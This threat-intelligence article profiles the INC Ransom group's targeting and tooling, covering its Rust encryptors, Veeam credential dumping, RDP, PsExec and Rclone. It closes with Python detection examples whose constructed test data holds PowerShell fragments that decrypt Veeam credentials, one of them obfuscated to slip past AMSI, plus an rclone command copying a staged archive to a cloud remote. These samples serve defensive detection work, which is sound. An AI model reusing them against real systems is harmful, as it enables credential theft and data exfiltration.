INC Ransom has been operating since August 2023. After nearly three years and more than 830 confirmed victims, it remains a ransomware group that security teams underestimate relative to its actual activity level. It doesn’t generate the same coverage volume as LockBit or RansomHub, it doesn’t operate a public-facing affiliate recruitment programme, and it avoids the kinds of high-profile provocations that bring sustained law enforcement attention. What it does instead is execute methodical, high-dwell-time intrusions against healthcare, legal, manufacturing, and financial services organisations, with a technical toolkit that has quietly improved over the past eighteen months.
The group’s 2025 transition to Rust-based encryptors for both Windows and Linux/ESXi environments, combined with an updated version of a modified Veeam credential extractor, represents the kind of capability investment that warrants more structured defensive attention than INC typically receives.
Background and Targeting
INC Ransom first appeared on eCrime forums in mid-2023 and claimed its first victims shortly after. The group operates as a ransomware-as-a-service outfit, with a core team maintaining the encryptor and tooling while affiliates handle initial access and intrusion. This structure is broadly consistent with other mature RaaS operations, but INC’s affiliate recruitment appears to be more controlled than open platforms like RansomHub — there is no public affiliate portal, and recruitment appears to happen through vetted introductions.
Sector focus has been consistent throughout the group’s existence: healthcare and hospital networks (where backup destruction maximises pressure), professional and legal services (where litigation data provides leverage), manufacturing and industrial services, and financial services firms. The healthcare sector has attracted disproportionate attention — INC’s March 2024 attack on NHS Scotland’s WannaCry-era IT infrastructure resulted in the theft of approximately 3TB of patient data, an incident that attracted UK government response and considerable media coverage.
By Q1 2026, independent tracking across multiple threat intelligence platforms placed INC among the five most prolific ransomware groups by victim count, with ransom demands ranging from several hundred thousand to multiple millions depending on the revenue of the target organisation.
The Technical Toolkit
Rust Encryptors: Windows and Linux/ESXi
INC’s original encryptor was written in C++, consistent with many RaaS toolkits of its generation. In late 2024, the group deployed rewritten Rust-based encryptors for both Windows and Linux environments, the latter specifically targeting VMware ESXi hypervisors. The Rust rewrite is operationally significant for three reasons.
First, Rust-compiled binaries produce executables with limited runtime dependencies and relatively limited debug information — both of which complicate static analysis. Second, Rust’s memory safety model, while not directly relevant to encryption speed, means the encryptor avoids certain classes of bug that can cause execution failures at scale. Third, cross-compilation in Rust is straightforward, enabling the development team to maintain a single codebase for the Windows and Linux variants, reducing the maintenance overhead of parallel codebases.
The encryption scheme uses AES-128-CTR for file content with RSA-2048 for key wrapping — a standard hybrid scheme that is cryptographically sound and produces no recoverable decryption path without the private key held by the operator. The Linux variant specifically targets .vmdk, .vmem, .vswp, and .vmsn files — the VMware-specific extensions corresponding to virtual disk images, memory snapshots, swap files, and snapshots respectively. Encrypting these files renders the entire VM fleet inoperable without restoring from external backup.
Veeam DPAPI Credential Dumper
Veeam Backup & Replication has been a consistent target for ransomware operators because it stores credentials for every backed-up system — typically the most privileged service accounts in the environment. If an operator can extract those credentials, they have direct authentication capability against every system Veeam is protecting.
Veeam encrypts stored credentials using DPAPI (Data Protection API), which ties the encryption to the service account running the Veeam service. The original Veeam-Get-Creds.ps1 script, published as a proof-of-concept by security researcher Youssef Sammouda in 2023, demonstrated that DPAPI-encrypted credentials could be extracted by a process running in the same session context. INC has been using a modified version of this script since at least early 2024.
The 2025 update to INC’s version addresses two defensive measures that organisations had begun deploying in response to earlier versions: the updated script handles newer Veeam versions and includes obfuscation that bypasses AMSI (Antimalware Scan Interface) string matching used by security products to flag the original script’s content. The extraction requires either SYSTEM or local administrator access on the Veeam backup server — which INC achieves via lateral movement before deploying the tool.
The practical outcome is that a successful INC intrusion that reaches the Veeam server can produce a plaintext credential list for every host in the backup inventory, typically including domain administrator accounts.
Living-Off-the-Land Execution
INC consistently uses legitimate tools to minimise the footprint of the intrusion before encryption. The pattern has been documented across multiple incident responses:
RDP for lateral movement. Rather than deploying custom lateral movement tooling, INC operators use Remote Desktop Protocol with stolen credentials — a technique that is both effective and difficult to distinguish from legitimate administrator activity in environments without behavioural baselining.
PsExec for execution. Remote execution of tools and payloads uses PsExec, the Sysinternals utility. Combined with stolen credentials, this enables execution on remote hosts without deploying an additional agent.
Cobalt Strike for C2. INC’s persistent access uses Cobalt Strike Beacon, typically deployed as a reflective DLL in memory. Some incident responses have documented the use of AnyDesk and ScreenConnect (legitimate remote access tools) as secondary C2 channels — a technique that maintains connectivity if the Cobalt Strike infrastructure is blocked or detected.
7-Zip and Rclone for exfiltration. Data is staged using 7-Zip (often with password-protected archives to prevent content inspection) and exfiltrated using Rclone, configured to push to cloud storage providers. Rclone’s legitimate use as a synchronisation tool means it is frequently permitted through network controls and doesn’t generate alerts in environments without DLP.
Initial Access Methods
INC’s initial access has varied across documented incidents. The most common vectors are phishing with credential harvesting or initial access through purchased stolen credentials, followed by exploitation of internet-facing VPN appliances and remote access services. The group has also been observed exploiting publicly disclosed vulnerabilities in enterprise applications during patch windows — specifically targeting healthcare and manufacturing environments that operate longer patching cycles due to uptime requirements.
Dwell Time and Operational Tempo
INC operates with deliberate patience before deploying encryption. Incident response data indicates a typical dwell time of two to four weeks between initial access and encryption — enough time to establish multiple persistence mechanisms, complete lateral movement, identify backup infrastructure, and exfiltrate valuable data for the double-extortion element.
The group runs a leak site at an onion address that has been stable since 2024, where stolen data is published for organisations that do not pay. Notably, INC has demonstrated willingness to publish NHS patient data despite the apparent reputational risk, suggesting either that the operator does not believe this will materially affect future victims’ payment decisions, or that the operator does not care about this category of consequence.
Osiris: A Possible Affiliate Overlap
In January 2026, Symantec’s Threat Hunter Team published analysis of a ransomware operation they named Osiris. The group had attacked a large Southeast Asian conglomerate — Symantec’s description is consistent with a diversified industrial holdings company — using a BYOVD (Bring Your Own Vulnerable Driver) technique to terminate endpoint detection and response software before deploying encryption.
The BYOVD component used the Poortry driver, a kernel driver previously observed in attacks attributed to groups with connections to the former UNC3944/Scattered Spider ecosystem. This driver is used specifically to unload security kernel modules — an operation that requires kernel-mode execution, which ordinary user-mode software cannot perform.
Symantec’s analysis noted code-level similarities between the Osiris encryptor and INC’s encryptor, suggesting either shared codebase — consistent with an affiliate relationship — or direct reuse of code obtained from the INC core team. The exact relationship is unclear from public information, but the overlap warrants treating Osiris campaigns as potentially sharing intelligence value with INC targeting patterns.
Defensive Priorities
Protect the Veeam server as a tier-0 asset. If Veeam is running in the environment, the server hosting it should have the same protection as a domain controller. Access should be restricted to dedicated administrator accounts, the server should have an EDR deployment with tamper protection enabled, and PowerShell execution should be constrained and monitored. Specifically, AMSI logging and Script Block Logging should be enabled to catch execution of the Veeam credential dumper even when AMSI real-time detection is bypassed.
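The point about Script Block Logging is worth making concrete. AMSI string matching is defeated by splitting or escaping the suspicious literals, but Script Block Logging (Event ID 4104) still records the block as PowerShell executes it, so a retrospective sweep that undoes simple literal splitting before matching recovers the signal. The following is an added example written for this article, not code from INC's tooling or from any vendor: it sweeps constructed 4104 events on the backup server for two indicators taken together. The indicators themselves are assumptions about the publicly available Veeam-Get-Creds.ps1 proof-of-concept, namely a query against the Veeam backup database's credentials table and a call to the .NET DPAPI wrapper's Unprotect method; the event records and the "obfuscated" sample are constructed for the test and are not real telemetry.

```python
"""Sweep PowerShell Script Block Logging events (Event ID 4104) for the
Veeam credential-dumper pattern, with light de-obfuscation before matching.
Added example; indicator strings are assumptions about the public PoC script."""
import re

# Constructed sample events (not real logs). The third block is a toy
# obfuscated variant: literals split with '+' and a backtick escape, which is
# enough to defeat naive AMSI string matching but not a normalised sweep.
EVENTS = [
    {"EventID": 4104, "Computer": "VEEAM01", "ScriptBlockText":
        "Get-VBRJob | Where-Object {$_.IsScheduleEnabled} | Select-Object Name, NextRun"},
    {"EventID": 4104, "Computer": "VEEAM01", "ScriptBlockText":
        "$q = 'SELECT user_name, password FROM [VeeamBackup].[dbo].[Credentials]'\n"
        "$pw = [System.Security.Cryptography.ProtectedData]::Unprotect($bytes, $null, 'LocalMachine')"},
    {"EventID": 4104, "Computer": "VEEAM01", "ScriptBlockText":
        "$q = 'SELECT user_name, pass' + 'word FROM [Veeam' + 'Backup].[dbo].[Cred' + 'entials]'\n"
        "$m = 'Unp' + 'rot' + 'ect'\n"
        "$pw = [System.Security.Cryptography.Pro`tectedData]::$m($bytes, $null, 'LocalMachine')"},
    {"EventID": 4103, "Computer": "VEEAM01", "ScriptBlockText": "pipeline event, out of scope"},
]

# Indicator groups (assumed from the public PoC): every term in a group must
# appear in the normalised block for that group to count.
VEEAM_STORE = ("veeambackup", "credentials")   # the credential table in the Veeam DB
DPAPI_UNPROTECT = ("protecteddata", "unprotect")  # .NET DPAPI decrypt call


def normalise(text):
    """Undo the cheap obfuscations a string matcher trips on:
    backtick escapes, 'abc' + 'def' literal splitting, whitespace, case."""
    t = text.replace("`", "")                       # Pro`tectedData -> ProtectedData
    t = re.sub(r"(['\"])\s*\+\s*\1", "", t)         # 'Unp' + 'rot' -> 'Unprot'
    t = re.sub(r"\s+", " ", t)
    return t.lower()


def scan_script_blocks(events):
    """Return one hit per 4104 event that carries both indicator groups."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        t = normalise(ev["ScriptBlockText"])
        store = all(term in t for term in VEEAM_STORE)
        dpapi = all(term in t for term in DPAPI_UNPROTECT)
        if store and dpapi:
            hits.append({"computer": ev["Computer"],
                         "indicators": ["veeam_credential_store", "dpapi_unprotect"]})
    return hits


if __name__ == "__main__":
    for hit in scan_script_blocks(EVENTS):
        print(hit)
```

The benign Veeam administration block (Get-VBRJob) produces no hit, while both the plain and the split-literal variants do. Requiring both indicator groups keeps ordinary DPAPI use by other scripts on the host from alerting; on a server that should never run ad-hoc PowerShell at all, the bar can reasonably be lowered to either group.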
Monitor RDP lateral movement. Establish baselines for RDP connections between internal hosts. Lateral movement via RDP from workstations to servers, or between servers, is abnormal in most environments. Alert on RDP connections originating from hosts that do not routinely use RDP, and on credential reuse across multiple systems in a short time window.
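As an added illustration of the baselining approach described above (example code written for this article, not a vendor rule or anything from INC's tooling), the block below builds a baseline of RemoteInteractive logons (Security Event ID 4624, LogonType 10) over a learning period and then raises two kinds of alert against new events: an RDP session from a source host that has never used RDP, or a source-to-destination pair not in the baseline, and one account reaching three or more distinct hosts over RDP within fifteen minutes. The event records, host names, the three-host threshold and the fifteen-minute window are all constructed assumptions to be tuned per environment.

```python
"""Baseline-and-alert logic for RDP lateral movement, built from Windows
Security 4624 logons with LogonType 10 (RemoteInteractive). Added example;
events, hosts and thresholds are constructed assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed learning-period events: a jump host is the only RDP source.
BASELINE_EVENTS = [
    {"time": "2026-01-05T09:02:00", "src": "JUMP01", "dst": "FS01", "user": "adm.ops", "logon_type": 10},
    {"time": "2026-01-05T09:40:00", "src": "JUMP01", "dst": "VEEAM01", "user": "adm.backup", "logon_type": 10},
    {"time": "2026-01-06T10:15:00", "src": "JUMP01", "dst": "FS01", "user": "adm.ops", "logon_type": 10},
    {"time": "2026-01-07T14:05:00", "src": "JUMP01", "dst": "SQL01", "user": "adm.ops", "logon_type": 10},
]

# Constructed detection-window events: a workstation hopping server to server
# at 02:00 with one reused account, plus normal jump-host activity.
NEW_EVENTS = [
    {"time": "2026-01-12T02:11:00", "src": "WS-0417", "dst": "FS01", "user": "adm.ops", "logon_type": 10},
    {"time": "2026-01-12T02:14:00", "src": "WS-0417", "dst": "SQL01", "user": "adm.ops", "logon_type": 10},
    {"time": "2026-01-12T02:17:00", "src": "WS-0417", "dst": "VEEAM01", "user": "adm.ops", "logon_type": 10},
    {"time": "2026-01-12T09:05:00", "src": "JUMP01", "dst": "FS01", "user": "adm.ops", "logon_type": 10},
    {"time": "2026-01-12T11:00:00", "src": "JUMP01", "dst": "FS01", "user": "adm.ops", "logon_type": 2},  # console logon, not RDP
]


def rdp_only(events):
    """Keep only RemoteInteractive (RDP) logons."""
    return [e for e in events if e["logon_type"] == 10]


def build_baseline(events):
    """Return the (src, dst) pairs seen over RDP and the set of RDP source hosts."""
    pairs = {(e["src"], e["dst"]) for e in rdp_only(events)}
    sources = {src for src, _ in pairs}
    return pairs, sources


def detect_rdp_anomalies(baseline_events, new_events,
                         hosts_threshold=3, window=timedelta(minutes=15)):
    """Alert on unseen RDP sources/pairs and on one account fanning out to
    >= hosts_threshold distinct hosts within `window`."""
    pairs, sources = build_baseline(baseline_events)
    alerts = []
    per_user = defaultdict(list)
    for e in sorted(rdp_only(new_events), key=lambda ev: ev["time"]):
        if e["src"] not in sources:
            alerts.append(("new_rdp_source", e["src"], e["dst"], e["user"]))
        elif (e["src"], e["dst"]) not in pairs:
            alerts.append(("new_rdp_pair", e["src"], e["dst"], e["user"]))
        per_user[e["user"]].append(e)

    # Credential reuse: sliding window over each account's RDP logons.
    for user, evs in per_user.items():
        times = [datetime.fromisoformat(x["time"]) for x in evs]
        for i in range(len(evs)):
            hosts = {evs[j]["dst"] for j in range(i, len(evs)) if times[j] - times[i] <= window}
            if len(hosts) >= hosts_threshold:
                alerts.append(("rdp_account_fanout", user, tuple(sorted(hosts)), evs[i]["time"]))
                break  # one fan-out alert per account is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_anomalies(BASELINE_EVENTS, NEW_EVENTS):
        print(alert)
```

The console logon at 11:00 is dropped by the LogonType filter, the jump host's routine session matches the baseline and stays silent, and the workstation produces three "new source" alerts plus one fan-out alert for the reused adm.ops account. A real deployment would learn the baseline over weeks rather than days and age out pairs that stop recurring.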
Detect Rclone configuration and execution. Rclone configured for cloud sync to providers like Mega, Backblaze B2, or Wasabi, particularly when installed under a non-standard path or with a configuration file created during working hours, is an indicator of staging for exfiltration. Process creation monitoring for rclone.exe with sync or copy subcommands and remote cloud destinations should generate alerts in environments where Rclone is not part of standard operations.
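The following is an added example of that process-creation rule, written for this article rather than taken from any vendor product or from INC's tooling. It triages constructed process-creation records with the fields Sysmon Event ID 1 or Security 4688 would supply (image path, command line) and alerts when rclone.exe is launched with a transfer verb and an rclone-style remote as an argument, adding context when the binary runs from outside Program Files or is pointed at an explicit config file. The transfer verbs and the `--config` option are rclone's own; the install-directory list and the sample command lines are assumptions constructed for the test.

```python
"""Process-creation triage for Rclone exfiltration staging (Sysmon Event ID 1
or Security 4688 fields). Added example; sample events and the list of
"standard" install directories are constructed assumptions."""
import re
from pathlib import PureWindowsPath

# rclone verbs that push data to a destination (rclone's own subcommands).
TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Assumed standard install locations; anything else is flagged as context.
STANDARD_DIRS = ("C:\\Program Files\\", "C:\\Program Files (x86)\\")

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\svc_backup\AppData\Local\Temp\rclone.exe",
     "CommandLine": r'"C:\Users\svc_backup\AppData\Local\Temp\rclone.exe" copy "C:\staging\finance.7z" mega:drop --config "C:\Users\svc_backup\r.conf" -P'},
    {"Image": r"C:\Program Files\rclone\rclone.exe",
     "CommandLine": r'"C:\Program Files\rclone\rclone.exe" lsd onsite-backup:'},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def is_remote(token):
    """True for rclone remote syntax ("name:path" or the on-the-fly ":backend:path"),
    false for Windows drive paths (C:\\...), URLs and option flags."""
    if token.startswith("-") or "://" in token:
        return False
    if re.match(r"^[A-Za-z]:([\\/]|$)", token):   # drive letter, e.g. C:\staging
        return False
    return re.match(r"^:?[A-Za-z0-9_.\-]+:", token) is not None


def triage_process_event(ev, standard_dirs=STANDARD_DIRS):
    """Return {'alert': bool, 'reasons': [...]} for one process-creation record."""
    image = ev["Image"]
    name = PureWindowsPath(image).name.lower()
    reasons = []
    if name != "rclone.exe":
        return {"alert": False, "reasons": reasons}   # rule scope: the rclone binary itself

    tokens = tokenize(ev["CommandLine"])
    args = tokens[1:]
    lowered = [t.lower() for t in args]

    verb = next((t for t in lowered if t in TRANSFER_VERBS), None)
    if verb:
        reasons.append(f"transfer verb: {verb}")
    remotes = [t for t in args if is_remote(t)]
    if remotes:
        reasons.append(f"remote destination: {remotes[-1]}")
    if not image.lower().startswith(tuple(d.lower() for d in standard_dirs)):
        reasons.append(f"non-standard binary path: {image}")
    for i, t in enumerate(lowered):
        if t == "--config" and i + 1 < len(args):
            reasons.append(f"explicit config file: {args[i + 1]}")
        elif t.startswith("--config="):
            reasons.append(f"explicit config file: {args[i].split('=', 1)[1]}")

    # A transfer verb plus a remote is the alert condition; the rest is context.
    return {"alert": bool(verb and remotes), "reasons": reasons}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage_process_event(ev))
```

The first record alerts with all four reasons; the listing command from the standard install path records the remote as context but does not alert; the unrelated svchost.exe record is out of scope. Renamed copies of the binary are not covered by an image-name rule and need file-hash or import-based telemetry instead.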
ESXi backup and network isolation. ESXi hosts should be managed via isolated management networks, with vCenter access restricted to dedicated admin workstations. The management network should be isolated from the production network to prevent lateral movement from a compromised Windows host to the ESXi layer. Backups of VM images should be stored on infrastructure not accessible from the production Windows domain.
Segment backup infrastructure at the network layer. The Veeam backup server’s network access should be restricted to only the hosts it backs up and the storage target. It should not be reachable from general user workstations or from the internet.
Assessing the Threat
INC Ransom represents a mature, technically capable RaaS operation that has operated continuously for nearly three years without the kind of disruption that affected LockBit, Hive, or BlackCat. The combination of a Rust-based cross-platform encryptor, an updated Veeam credential dumper, and disciplined LOLBin usage creates an adversary that is harder to detect mid-intrusion and harder to recover from post-encryption than many organisations’ current defences are calibrated for.
The healthcare sector’s continued appearance in INC’s victim list despite the reputational and political costs of those attacks suggests the group has made a deliberate calculation that the operational pressure healthcare targets face — and the value of the data they hold — outweighs any inhibition from public attention. For defenders in that sector, INC’s TTPs should be a priority input into detection engineering and tabletop exercise design.